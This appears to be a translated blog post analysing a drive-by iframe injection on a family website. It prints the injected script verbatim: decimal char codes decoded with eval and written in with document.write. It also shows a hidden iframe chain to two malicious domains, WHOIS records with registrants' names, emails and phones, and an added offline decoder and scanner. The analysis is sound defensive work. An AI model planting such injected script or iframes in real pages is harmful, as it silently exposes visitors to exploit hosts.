First published on my blog: http://www.areway.cn/?p=175
Over the weekend, as soon as I came online, 鸭子 ("Duck") messaged me on QQ to say his site had been hit with a drive-by iframe injection (挂马). I didn't think much of it and just opened the link directly; here is the page source I captured:
<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,
114,99,61,104,116,116,112,58,47,47,102,114,
101,101,46,117,45,117,117,117,46,99,110,47,
101,114,114,111,114,46,104,116,109,32,119,
105,100,116,104,61,49,48,48,32,104,101,105,
103,104,116,61,48,62,60,47,105,102,114,97,
109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
At the top there is a decimal-encoded script segment. Roughly what it does: it stores all the character codes in the string t, uses eval() to turn them back into text through String.fromCharCode, and finally calls document.write(t) to write the resulting markup into the page, so the browser renders it as if it were part of the original HTML.
The decoded string is roughly as follows (click it at your own risk):
<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
Whois lookup for the domain u-uuu.cn:
Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server: ns.yovole.com
Name Server: ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address, but nothing much came of it...
I moved on to a virtual machine to keep analyzing: opened the link above in IE, viewed the source... and there was yet another nested iframe right away.
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
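Here is an added example, not code from the original post, that does by hand what the two stages above did in the browser: it decodes the decimal String.fromCharCode payload from the first stage without calling eval() or document.write(), then scans both the raw markup and the decoded output for hidden iframes and remote scripts, which is how the 1x1 iframe of the second stage stands out. The two sample captures are constructed from the markup quoted in the post; the function names and the "hidden" threshold (either dimension 1px or smaller, or an inline display:none / visibility:hidden) are my own assumptions and go slightly beyond the height=0 and width=1 height=1 cases seen on this page.

```javascript
// Added example, not code from the original post: an offline decoder and
// hidden-iframe scanner for the injection chain quoted above. It never calls
// eval() or document.write(), so captured page source can be triaged in Node
// without executing anything. The sample captures below are constructed from
// the two stages quoted in the post; the function names are my own.

// Stage 1: the two injected <script> tags seen in the site's source. The
// decimal list is copied from the post; both tags carry the same list.
const CODES =
  "60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47," +
  "102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114," +
  "46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103," +
  "104,116,61,48,62,60,47,105,102,114,97,109,101,62";
const INJECTED_SCRIPT =
  `<script>t='${CODES}';t=eval('String.fromCharCode('+t+')');document.write(t);</script>`;
const STAGE1_HTML =
  INJECTED_SCRIPT + "\n" + INJECTED_SCRIPT + "\n" +
  '<html xmlns="http://www.w3.org/1999/xhtml"><head><title>首页 - 爱生活家庭网</title>';

// Stage 2: what free.u-uuu.cn/error.htm served according to the post: a 1x1
// iframe to the next hop plus a third-party counter script.
const STAGE2_HTML =
  "<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>\n" +
  '<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>';

// Find every quoted run of comma-separated decimals (four or more codes) and
// decode it with String.fromCharCode. This yields exactly the text the
// injected eval(...) would have produced, minus the execution.
function decodeCharCodeStrings(html) {
  const re = /['"]\s*(\d{1,3}(?:\s*,\s*\d{1,3}){3,})\s*['"]/g;
  const out = [];
  for (const m of html.matchAll(re)) {
    const codes = m[1].split(",").map((s) => Number(s.trim()));
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Parse the attributes of one opening tag. Handles "v", 'v' and unquoted v,
// which the injected markup uses (src=http://... width=100 height=0).
function parseAttrs(tag) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  for (const m of tag.matchAll(re)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Assumed heuristic: an iframe is "hidden" when either dimension is 1px or
// less, or when inline style switches it off. width=100 height=0 and
// width=1 height=1 (both seen in this chain) qualify.
function isHiddenIframe(attrs) {
  const tiny = (v) => v !== undefined && Number.parseFloat(v) <= 1;
  const style = (attrs.style || "").replace(/\s+/g, "").toLowerCase();
  return tiny(attrs.width) || tiny(attrs.height) ||
    style.includes("display:none") || style.includes("visibility:hidden");
}

function findIframes(html) {
  return Array.from(html.matchAll(/<iframe\b[^>]*>/gi), (m) => {
    const a = parseAttrs(m[0]);
    return { src: a.src, width: a.width, height: a.height, hidden: isHiddenIframe(a) };
  });
}

function findExternalScripts(html) {
  return Array.from(html.matchAll(/<script\b[^>]*>/gi), (m) => parseAttrs(m[0]).src)
    .filter((src) => src !== undefined);
}

// Triage one capture: decode obfuscated strings, then scan both the raw HTML
// and the decoded output for iframes and remote scripts.
function analyzeCapture(html) {
  const decoded = decodeCharCodeStrings(html);
  const expanded = html + "\n" + decoded.join("\n");
  const iframes = findIframes(expanded);
  return {
    decoded,
    hiddenIframes: iframes.filter((f) => f.hidden),
    externalScripts: findExternalScripts(expanded),
  };
}

console.log(JSON.stringify(analyzeCapture(STAGE1_HTML), null, 2));
console.log(JSON.stringify(analyzeCapture(STAGE2_HTML), null, 2));
```

Run it with `node` and the first report lists the decoded `<iframe src=http://free.u-uuu.cn/error.htm width=100 height=0></iframe>` twice (the payload was injected twice) and flags it as hidden; the second report flags the 1x1 iframe pointing at www.foafau.info and lists the 51yes.com counter script as the only remote script. Decoding statically rather than letting eval() run is the important habit here: the same regex-and-fromCharCode approach works for any page where the payload is only a list of character codes, whereas opening the link in a browser, even a VM, executes whatever the next hop serves.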
This domain is quite possibly the trojan author's own:
Details for foafau.info:
Access to INFO WHOIS information is provided to assist persons in
determining the contents of a domain name registration record in the
Afilias registry database. The data in this record is provided by
Afilias Limited for informational purposes only, and Afilias does not
guarantee its accuracy. This service is intended only for query-based
access. You agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to: (a) allow,
enable, or otherwise support the transmission by e-mail, telephone, or
facsimile of mass unsolicited, commercial advertising or solicitations
to entities other than the data recipient's own existing customers; or
(b) enable high volume, automated, electronic processes that send
queries or data to the systems of Registry Operator, a Registrar, or
Afilias except as reasonably necessary to register domain names or
modify existing registrations. All rights reserved. Afilias reserves
the right to modify these terms at any time. By submitting this query,
you agree to abide by this policy.
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Organization:
Registrant Street1:beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Organization:
Admin Street1:beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Organization:
Billing Street1:beijing
Billing Street2:
Billing Street3:
Billing City:beijing
Billing State/Province:
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Organization:
Tech Street1:beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Next I downloaded the code from each of these files:
Going through them one by one..
They are all decimal-encoded in the same way, and I couldn't be bothered to analyze any further. Anyone with a taste for it can carry on from here.